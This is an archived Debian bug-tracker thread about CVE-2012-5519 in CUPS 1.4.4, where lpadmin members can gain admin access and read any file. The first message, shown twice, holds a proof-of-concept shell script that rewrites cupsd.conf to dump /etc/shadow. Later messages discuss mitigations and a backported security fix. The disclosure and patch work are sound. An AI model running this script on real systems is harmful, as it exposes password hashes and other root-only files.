Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss
Bug#692791: members of lpadmin can read every file on server via cups
37 views
Skip to first unread message
Jörg Ludwig
Nov 8, 2012, 5:50:02 PM11/8/12
to
Package: cups
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole
Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.
As it is not possible to use the cups authentication with a normal webbrowser I created a simple shell script to show the effect. When called as any unprivileged user which is member of lpadmin it should display the contents of /etc/shadow:
#!/bin/sh
set -e
# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"
POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF
GET http://localhost:631/admin/log/page_log
This bug was detected by one of our customers, Jann Horn.
-- System Information:
Debian Release: 6.0.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages cups depends on:
ii adduser 3.112+nmu2 add and remove users and groups
ii bc 1.06.95-2 The GNU bc arbitrary precision cal
ii cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-ppdc 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii libavahi-client3 0.6.27-2+squeeze1 Avahi client library
ii libavahi-common3 0.6.27-2+squeeze1 Avahi common library
ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib
ii libcups2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsdriver1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsimage2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsmime1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsppdc1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst
ii libgcc1 1:4.4.5-8 GCC support library
ii libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii libgssapi-krb5-2 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii libijs-0.35 0.35-7 IJS raster image transport protoco
ii libkrb5-3 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii libldap-2.4-2 2.4.23-7.2 OpenLDAP libraries
ii libpam0g 1.1.1-6.1+squeeze1 Pluggable Authentication Modules l
ii libpaper1 1.1.24 library for handling paper charact
ii libpoppler5 0.12.4-1.2 PDF rendering library
ii libslp1 1.2.1-7.8 OpenSLP libraries
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
ii libusb-0.1-4 2:0.1.12-16 userspace USB programming library
ii lsb-base 3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple
ii procps 1:3.2.8-9squeeze1 /proc file system utilities
ii ssl-cert 1.0.28 simple debconf wrapper for OpenSSL
ii ttf-freefont 20090104-7 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.4.dfsg-3 compression library - runtime
Versions of packages cups recommends:
ii cups-driver-gutenprint 5.2.6-1 printer drivers for CUPS
ii foomatic-filters 4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii ghostscript-cups 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
Versions of packages cups suggests:
ii cups-bsd 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
pn cups-pdf <none> (no description available)
ii foomatic-db 20100630-1 OpenPrinting printer support - dat
pn hplip <none> (no description available)
ii smbclient 2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for
ii udev 164-3 /dev/ and hotplug management daemo
pn xpdf-korean | xpdf-jap <none> (no description available)
-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]
-- debconf information excluded
--
To UNSUBSCRIBE, email to debian-bugs-...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listm...@lists.debian.org
Version: 1.4.4-7+squeeze1
Severity: critical
Tags: security
Justification: root security hole
Members of lpadmin cat read /var/run/cups/certs/0. With this key it is possible to access the cups web interface as admin. You can edit the cups config file and set the page log to any filename you want (for example /etc/shadow). Then you can read the file contents by viewing the cups page log. By printing you can also write some random data to the given file.
As it is not possible to use the cups authentication with a normal webbrowser I created a simple shell script to show the effect. When called as any unprivileged user which is member of lpadmin it should display the contents of /etc/shadow:
#!/bin/sh
set -e
# backup cupsd.conf
cp /etc/cups/cupsd.conf /tmp
AUTH="Authorization: Local $(cat /var/run/cups/certs/0)"
POST -d -H "$AUTH" -H "Cookie: org.cups.sid="
http://localhost:631/admin/ <<EOF
OP=config-server&org.cups.sid=&SAVECHANGES=1&CUPSDCONF=Listen
localhost:631%0APageLog /etc/shadow
EOF
GET http://localhost:631/admin/log/page_log
This bug was detected by one of our customers, Jann Horn.
-- System Information:
Debian Release: 6.0.6
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 2.6.32-5-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages cups depends on:
ii adduser 3.112+nmu2 add and remove users and groups
ii bc 1.06.95-2 The GNU bc arbitrary precision cal
ii cups-client 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-common 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii cups-ppdc 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii debconf [debconf-2. 1.5.36.1 Debian configuration management sy
ii ghostscript 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
ii libavahi-client3 0.6.27-2+squeeze1 Avahi client library
ii libavahi-common3 0.6.27-2+squeeze1 Avahi common library
ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib
ii libcups2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupscgi1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsdriver1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsimage2 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsmime1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libcupsppdc1 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst
ii libgcc1 1:4.4.5-8 GCC support library
ii libgnutls26 2.8.6-1+squeeze2 the GNU TLS library - runtime libr
ii libgssapi-krb5-2 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries - k
ii libijs-0.35 0.35-7 IJS raster image transport protoco
ii libkrb5-3 1.8.3+dfsg-4squeeze6 MIT Kerberos runtime libraries
ii libldap-2.4-2 2.4.23-7.2 OpenLDAP libraries
ii libpam0g 1.1.1-6.1+squeeze1 Pluggable Authentication Modules l
ii libpaper1 1.1.24 library for handling paper charact
ii libpoppler5 0.12.4-1.2 PDF rendering library
ii libslp1 1.2.1-7.8 OpenSLP libraries
ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3
ii libusb-0.1-4 2:0.1.12-16 userspace USB programming library
ii lsb-base 3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple
ii procps 1:3.2.8-9squeeze1 /proc file system utilities
ii ssl-cert 1.0.28 simple debconf wrapper for OpenSSL
ii ttf-freefont 20090104-7 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.4.dfsg-3 compression library - runtime
Versions of packages cups recommends:
ii cups-driver-gutenprint 5.2.6-1 printer drivers for CUPS
ii foomatic-filters 4.0.5-6+squeeze2 OpenPrinting printer support - fil
ii ghostscript-cups 8.71~dfsg2-9 The GPL Ghostscript PostScript/PDF
Versions of packages cups suggests:
ii cups-bsd 1.4.4-7+squeeze1 Common UNIX Printing System(tm) -
pn cups-pdf <none> (no description available)
ii foomatic-db 20100630-1 OpenPrinting printer support - dat
pn hplip <none> (no description available)
ii smbclient 2:3.6.6-2~bpo60+1 command-line SMB/CIFS clients for
ii udev 164-3 /dev/ and hotplug management daemo
pn xpdf-korean | xpdf-jap <none> (no description available)
-- Configuration Files:
/etc/cups/cupsd.conf changed [not included]
-- debconf information excluded
--
To UNSUBSCRIBE, email to debian-bugs-...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listm...@lists.debian.org
Jörg Ludwig
Nov 8, 2012, 6:50:02 PM11/8/12
to
A line break got inserted into the script while posting. Here is the
correct one.
--
Mit freundlichen Grüßen,
Jörg Ludwig
IServ GmbH
Rebenring 33
38106 Braunschweig
Telefon: 0531-3804450
Fax: 0531-4287745
Mobil: 0179-9101055
E-Mail: joerg....@iserv.eu
Internet: www.iserv.eu
USt.-IdNr.: DE265149425
correct one.
--
Mit freundlichen Grüßen,
Jörg Ludwig
IServ GmbH
Rebenring 33
38106 Braunschweig
Telefon: 0531-3804450
Fax: 0531-4287745
Mobil: 0179-9101055
E-Mail: joerg....@iserv.eu
Internet: www.iserv.eu
USt.-IdNr.: DE265149425
Martin Pitt
Nov 10, 2012, 7:50:02 AM11/10/12
to
Didier 'OdyX' Raboud [2012-11-10 12:48 +0100]:
> * Have cupsd run as lp user
We had done that in Debian for several years for security reasons. We
had a huge patch to make most of cups work as user "lp", but at some
point I gave up: it caused too many bugs, didn't work with a lot of
third-party drivers, and broke with every new upstream release.
Upstream has never bought into the idea of running the main server as
an unprivileged system user unfortunately.
So this is possible in principle, but will mean a huge maintenance
overhead.
> * Forbid any changes to the config file from the webinterface
That would drop a huge piece of functionality.
> * Another idea ?
cupsd could temporarily drop privileges to lp when reading log files;
with that you are restricted to reading world-readable files as well
as cups' own files, which should be fine?
Martin
--
Martin Pitt | http://www.piware.de
Ubuntu Developer (www.ubuntu.com) | Debian Developer (www.debian.org)
> * Have cupsd run as lp user
We had done that in Debian for several years for security reasons. We
had a huge patch to make most of cups work as user "lp", but at some
point I gave up: it caused too many bugs, didn't work with a lot of
third-party drivers, and broke with every new upstream release.
Upstream has never bought into the idea of running the main server as
an unprivileged system user unfortunately.
So this is possible in principle, but will mean a huge maintenance
overhead.
> * Forbid any changes to the config file from the webinterface
That would drop a huge piece of functionality.
> * Another idea ?
cupsd could temporarily drop privileges to lp when reading log files;
with that you are restricted to reading world-readable files as well
as cups' own files, which should be fine?
Martin
--
Martin Pitt | http://www.piware.de
Ubuntu Developer (www.ubuntu.com) | Debian Developer (www.debian.org)
Didier 'OdyX' Raboud
Dec 7, 2012, 8:10:01 PM12/7/12
to
Hi dear security team,
I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
It is a backport of the patches discussed on the upstream bug [#4223] for cups
1.4.4, plus the needed packaging changes to make /etc/cups/cupsd.conf not a
configuration file anymore.
Note that contrary to what was done in unstable, the patch is added last, not
first.
Please advise, cheers,
OdyX
[#4223](https://www.cups.org/str.php?L4223)
I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
It is a backport of the patches discussed on the upstream bug [#4223] for cups
1.4.4, plus the needed packaging changes to make /etc/cups/cupsd.conf not a
configuration file anymore.
Note that contrary to what was done in unstable, the patch is added last, not
first.
Please advise, cheers,
OdyX
[#4223](https://www.cups.org/str.php?L4223)
Didier Raboud
Dec 8, 2012, 5:40:01 AM12/8/12
to
Le samedi, 8 décembre 2012 09.12:20, Yves-Alexis Perez a écrit :
> a bit in unstable. There already have been few correction in sid, so in
> case there are more, it's better to include the relevant bits at first.
Sure! My intent was just to make the 1.4.4 backport of the patch public, not
necessarily to have it released immediately.
That said, who triggers the re-examination of the patch for security release?
OdyX
> On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> >
> > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> >
> To be honest, considering how invasive the patch is, I'd like it to stay
> >
> > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> >
> a bit in unstable. There already have been few correction in sid, so in
> case there are more, it's better to include the relevant bits at first.
Sure! My intent was just to make the 1.4.4 backport of the patch public, not
necessarily to have it released immediately.
That said, who triggers the re-examination of the patch for security release?
OdyX
Didier 'OdyX' Raboud
Dec 8, 2012, 7:50:02 AM12/8/12
to
Le samedi, 8 décembre 2012 12.26:05, Yves-Alexis Perez a écrit :
> > That said, who triggers the re-examination of the patch for security
> > release?
>
> What do you mean?
> > That said, who triggers the re-examination of the patch for security
> > release?
>
> I'd like it to stay a bit in unstable
I was just wondering about who would decide when it would be "the good time".
I guess I'll ping the bug around when the unstable patch would have reached
wheezy.
Cheers,
Yves-Alexis Perez
Dec 8, 2012, 8:10:02 AM12/8/12
to
On sam., 2012-12-08 at 13:43 +0100, Didier 'OdyX' Raboud wrote:
> Le samedi, 8 décembre 2012 12.26:05, Yves-Alexis Perez a écrit :
> > > That said, who triggers the re-examination of the patch for
> security
> > > release?
> >
> > What do you mean?
>
> > I'd like it to stay a bit in unstable
>
> #define "a bit" ?
>
> I was just wondering about who would decide when it would be "the good
> time".
> I guess I'll ping the bug around when the unstable patch would have
> reached
> wheezy.
Yes, I guess that if/when RT team decides it's good enough for Wheezy we
> Le samedi, 8 décembre 2012 12.26:05, Yves-Alexis Perez a écrit :
> > > That said, who triggers the re-examination of the patch for
> security
> > > release?
> >
> > What do you mean?
>
> > I'd like it to stay a bit in unstable
>
> #define "a bit" ?
>
> I was just wondering about who would decide when it would be "the good
> time".
> I guess I'll ping the bug around when the unstable patch would have
> reached
> wheezy.
can reevaluate the situation.
Thanks for your work, and regards,
--
Yves-Alexis Perez
Debian Security
Moritz Mühlenhoff
Dec 27, 2012, 3:10:02 PM12/27/12
to
On Sat, Dec 08, 2012 at 11:32:57AM +0100, Didier Raboud wrote:
> Le samedi, 8 d�cembre 2012 09.12:20, Yves-Alexis Perez a �crit :
the update now.
Didier, can you upload to security-master, please?
Cheers,
Moritz
> Le samedi, 8 d�cembre 2012 09.12:20, Yves-Alexis Perez a �crit :
> > On sam., 2012-12-08 at 01:58 +0100, Didier 'OdyX' Raboud wrote:
> > >
> > > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > >
> > To be honest, considering how invasive the patch is, I'd like it to stay
> > a bit in unstable. There already have been few correction in sid, so in
> > case there are more, it's better to include the relevant bits at first.
>
> Sure! My intent was just to make the 1.4.4 backport of the patch public, not
> necessarily to have it released immediately.
>
> That said, who triggers the re-examination of the patch for security release?
AFAICS can there haven't been any regressions, can we should go ahead with
> > >
> > > I propose to get CVE-2012-5519 (#692791) fixed with the attached debdiff.
> > >
> > To be honest, considering how invasive the patch is, I'd like it to stay
> > a bit in unstable. There already have been few correction in sid, so in
> > case there are more, it's better to include the relevant bits at first.
>
> Sure! My intent was just to make the 1.4.4 backport of the patch public, not
> necessarily to have it released immediately.
>
> That said, who triggers the re-examination of the patch for security release?
the update now.
Didier, can you upload to security-master, please?
Cheers,
Moritz
Didier 'OdyX' Raboud
Dec 29, 2012, 9:00:01 AM12/29/12
to
Le vendredi, 28 décembre 2012 19.39:33, Moritz Mühlenhoff a écrit :
> On Fri, Dec 28, 2012 at 06:40:29PM +0100, Didier 'OdyX' Raboud wrote:
>
> I meant: No regressions in sid -> We can proceed with stable
Uploaded to unembargoed as 1.4.4-7+squeeze2.
The code is on http://anonscm.debian.org/gitweb/?p=pkg-
cups/cups.git;a=shortlog;h=refs/heads/master-squeeze
Cheers,
OdyX
> On Fri, Dec 28, 2012 at 06:40:29PM +0100, Didier 'OdyX' Raboud wrote:
> > Le jeudi, 27 décembre 2012 20.43:12, Moritz Mühlenhoff a écrit :
> > > AFAICS can there haven't been any regressions, can we should go ahead
> > > with the update now.
> >
> > EPARSE
> > > AFAICS can there haven't been any regressions, can we should go ahead
> > > with the update now.
> >
>
> I meant: No regressions in sid -> We can proceed with stable
Uploaded to unembargoed as 1.4.4-7+squeeze2.
The code is on http://anonscm.debian.org/gitweb/?p=pkg-
cups/cups.git;a=shortlog;h=refs/heads/master-squeeze
Cheers,
OdyX
0 new messages